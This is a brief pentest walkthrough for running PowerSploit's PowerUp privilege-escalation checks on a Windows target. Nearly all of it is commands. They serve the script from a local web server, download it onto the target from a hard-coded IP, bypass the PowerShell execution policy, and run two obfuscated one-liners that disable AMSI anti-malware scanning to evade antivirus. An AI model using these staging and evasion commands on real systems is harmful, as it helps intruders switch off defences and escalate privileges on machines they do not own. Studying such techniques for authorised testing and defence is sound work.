PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment.
PowerUp
- Clearing house of common privilege escalation checks, along with some weaponization vectors.
How to
1. Download the Tool
- git clone https://github.com/PowerShellMafia/PowerSploit.git
- cd PowerSploit/Privesc
- ls
2. Transfer the tool to the remote machine, first set a web server in the local machine
- python3 -m http.server 9999
3. In the remote server using powershell run the following
- IWR http://192.168.0.12:9999/PowerUp.ps1 -OutFile PowerUp.ps1
- dir
4. Bypass the execution policy
- powershell -ep bypass
5. Bypass AMSI protection (anti-malware)
- sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
# New AMSI bypass obfuscation:
- [ReF]."`A$(echo sse)`mB$(echo L)`Y"."g`E$(echo tty)p`E"(( "Sy{3}ana{1}ut{4}ti{2}{0}ils" -f'iUt','gement.A',"on.Am`s",'stem.M','oma') )."$(echo ge)`Tf`i$(echo El)D"(("{0}{2}ni{1}iled" -f'am','tFa',"`siI"),("{2}ubl{0}`,{1}{0}" -f 'ic','Stat','NonP'))."$(echo Se)t`Va$(echo LUE)"($(),$(1 -eq 1))
Note. AntiVirus could block this from running.
6. Proceed to import PowerUp and run it
- Import-Module .\PowerUp.ps1
- Invoke-AllChecks
